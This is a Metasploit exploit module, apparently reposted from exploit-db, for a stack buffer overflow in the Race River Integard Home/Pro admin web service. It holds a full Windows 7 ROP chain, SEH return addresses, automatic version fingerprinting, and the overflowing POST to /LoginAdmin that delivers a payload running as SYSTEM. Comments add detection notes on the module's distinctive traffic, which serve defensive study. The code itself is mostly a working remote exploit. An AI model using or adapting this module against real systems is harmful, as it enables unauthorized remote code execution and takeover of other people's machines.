Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
来源:http://www.exploit-db.com 作者:Node 发布时间:2010-09-16  

# Exploit Title: Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
# Date: 2010-09-15
# Author: Node
# Software Link: http://www.exploit-db.com/application/14941
# Version: Race River Integard Pro 2.2.0.9026, integard32.dll(v.2.0.0.306)
# Tested on: Windows 7 x64 Eng
# CVE : -

# Metasploit exploit module for the Race River Integard Home/Pro administration
# HTTP service (default port 18881, see register_options below).  The module
# POSTs to /LoginAdmin with an over-long Password form field; the non-automatic
# targets differ only in how the tail of that buffer is laid out (a pop/pop/ret
# address for the two SEH targets, a ROP chain for the Windows 7 target).
#
# Detection notes: the traffic produced here is distinctive -- a GET /banner.jpg
# fingerprint request followed by a POST /LoginAdmin whose Password value is
# several kilobytes of upper-case alpha filler, a fixed Host header of
# '192.168.1.1:18881' regardless of RHOST, and a declared Content-Length of
# 1074 that is shorter than the body actually built in #exploit.
class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking # stack bof, seh, universal ret, auto targeting

 include Msf::Exploit::Remote::HttpClient

 # Registers the module metadata (name, authors, references, payload
 # constraints and targets) with the framework.
 #
 # @param info [Hash] metadata overrides, merged by update_info
 #
 # Payload constraints: at most 1000 bytes of encoded payload; BadChars
 # excludes NUL and the form/URL delimiter bytes (space, &, /, =, ?, \),
 # presumably because they would split or terminate the form-encoded body
 # built in #exploit.
 #
 # Targets: index 0 is automatic detection, which (see #exploit) can only
 # resolve to the two SEH targets at index 1 and 2 ('Ret' is the pop/pop/ret
 # address per the inline comments); the Windows 7 ROP target at index 3 has
 # to be selected explicitly.
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow',
   'Description'    => %q{
      This module exploits a stack buffer overflow in Race river's Integard Home/Pro
     internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are
     vulnerable.

     The administration web page on port 18881 is vulnerable to a remote buffer overflow
     attack. By sending an long character string in the password field, both the structured
     exception handler and the saved extended instruction pointer are over written, allowing
     an attacker to gain control of the application and the underlying operating system
     remotely.

     The administration website service runs with SYSTEM privileges, and automatically
     restarts when it crashes.
   },
   'Author'  =>
    [
     'Lincoln', # original discovery
     'Nullthreat',
     'rick2600',
     'corelanc0d3r',
     'jduck', # fleshed out module from advisory
     'Node' # Win7 rop-code
    ],
   'License'       => MSF_LICENSE,
   'Version'       => '$Revision: 99999 $',
   'References'    =>
    [
     ['OSVDB', '67909'],
     ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'thread',
    },
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
     'StackAdjustment' => -1500,
    },
   'Platform'       => 'win',
   'Privileged'     => false,
   'Targets'        =>
    [
     [ 'Automatic Targeting',          { 'auto' => true }],
     [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}], # p/p/r
     [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}], # p/p/r
     [ 'Integard Pro  2.2.0.9026, integard32.dll(v.2.0.0.306) (Windows 7 x64 Eng)', { 'Win7' => true,}]
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Sep 07 2010'))

  register_options(
   [
    Opt::RPORT(18881)
   ], self.class )
 end

 # Fingerprints the target (in automatic mode), builds the overflow buffer for
 # the selected layout and sends it as the Password field of a POST to
 # /LoginAdmin, then hands off to the payload handler.
 #
 # @raise [RuntimeError] when automatic detection cannot identify the version
 def exploit

  # ROP chain, used only when target['Win7'] is set (see the buffer layout
  # below).  Every entry is either a little-endian DWORD ('V') or alpha
  # filler.  The gadget annotations are the original author's and are not
  # verified here; the "1111".."5555" strings are labelled by the author as
  # placeholders for the VirtualProtect call frame, presumably patched by the
  # chain at run time.
  rop = [0x10010793].pack('V') # RET
  rop << rand_text_alpha_upper(20)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFB8A378].pack('V') # PUSH ESP # SUB EAX,20 # POP EBX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x100111B7].pack('V')  # ADD ESP,2C # POP ESI # POP EBP # RETN
  rop << "1111" #VirtualProtect placeholder
  rop << "2222" #return address placeholder
  rop << "3333" #lpAddress placeholder
  rop << "4444" #dwsize placeholder
  rop << "5555" #flNewProtect placeholder
  rop << [0x10019005].pack('V') # writable
  rop << rand_text_alpha_upper(28)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFBBA5CE].pack('V') # INC EBX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010EB5].pack('V')  # POP EDI # POP ESI # RETN
  rop << [0x10019005].pack('V') # writable
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFB95B6F].pack('V')  # PUSH EBX # SBB BYTE PTR DS:[EDI+5E],BL # POP EBP # MOV EAX,-2 # POP EBX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFFFF41C].pack('V') #length to kernel32
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100107E8].pack('V') # POP EAX # POP ESI # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xEFFF2E41].pack('V') # ADD EBX,EBP # RETN
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xEFFF2E41].pack('V') # ADD EBX,EBP # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xEFFFA79E].pack('V') # XCHG EAX,EBP # POP ESI # POP EBP # POP EDI # POP EBX # POP ECX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V') # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x100137AB].pack('V')  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFE75].pack('V') # length to VP
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V')  # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V')  # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V')  # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFF868].pack('V')  # length to shellcode
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V')  # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0x10010798].pack('V')  # ADD DWORD PTR DS:[EAX],EDX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x100137AB].pack('V')  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFC18].pack('V')  # size (1000)
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFFC0].pack('V')  # newprotect(0x40)
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFFF0].pack('V') # length to saved VP on the stack
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xEFFF2818].pack('V')  # XCHG EAX,ESP # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V')  # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010F0B].pack('V')  # CALL EBX # ...

  # Target selection.  In automatic mode the Content-Length of /banner.jpg
  # distinguishes Home (24584) from Pro (23196); any other value leaves
  # mytarget nil and trips the RuntimeError below.
  # NOTE(review): response['Content-Length'] is read without checking that
  # send_request_raw returned a response at all; a nil response (e.g. on
  # timeout) raises NoMethodError here instead of the RuntimeError below.
  mytarget = nil
  if (target['auto'])
   print_status("Automatically detecting the target...")
   response = send_request_raw(
    {
     'uri' => '/banner.jpg',
     'version' => '1.1',
     'method' => 'GET'
    }, 5)

   case response['Content-Length'].to_i
   when 24584
    print_status("[!] Found Version - Integard Home")
    mytarget = targets[1]
   when 23196
    mytarget = targets[2]
    print_status("[!] Found Version - Integard Pro")
   end

  else
   mytarget = target
  end

  if not mytarget
   raise RuntimeError, "Unable to automatically detect the target version"
  end

  print_status("Selected Target: #{mytarget.name}")

  # Buffer layout is keyed on the user-selected `target`, not on `mytarget`;
  # in automatic mode `target` is the 'auto' entry, so the SEH layout is used.
  # Win7 layout: 832 bytes of filler, the ROP chain padded to 2000 bytes, then
  # the payload padded to 1000 bytes (3832 bytes total).
  # SEH layout: filler plus payload totalling 3091 bytes, two hard-coded
  # machine-code stubs, then the target's pop/pop/ret address (3104 bytes).
  print_status("Building Buffer")
  pay = payload.encoded
  if (target['Win7'])
   buffer = rand_text_alpha_upper(832)
   buffer << rop
   buffer << rand_text_alpha_upper(2000 - rop.length)
   buffer << pay
   buffer << rand_text_alpha_upper(1000 - pay.length)
  else

   buffer = ''
   buffer << rand_text_alpha_upper(3091 - pay.length)
   buffer << pay
   buffer << "\xE9\x2B\xF8\xFF\xFF"
   buffer << "\xEB\xF9\x90\x90"
   buffer << [mytarget.ret].pack('V')
  end
   # NOTE(review): Host and Content-Length are hard-coded rather than derived
   # from the datastore and the actual body length; the body built above is
   # longer than 1074 bytes.  Both values are therefore fixed artifacts of
   # this module's traffic (whether the framework sends the declared header
   # as-is is not visible from here).
   print_status("Sending Request")
   send_request_raw({
     'uri' => '/LoginAdmin',
     'version' => '1.1',
     'method' => 'POST',
     'headers' =>
      {
       'Host' => '192.168.1.1:18881',
       'Content-Length' => 1074
      },
     'data' => "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
    }, 5)

   print_status("Request Sent")

   # Hand control to the framework's payload handler (e.g. wait for a
   # connection from the delivered payload).
   handler
 end
end


 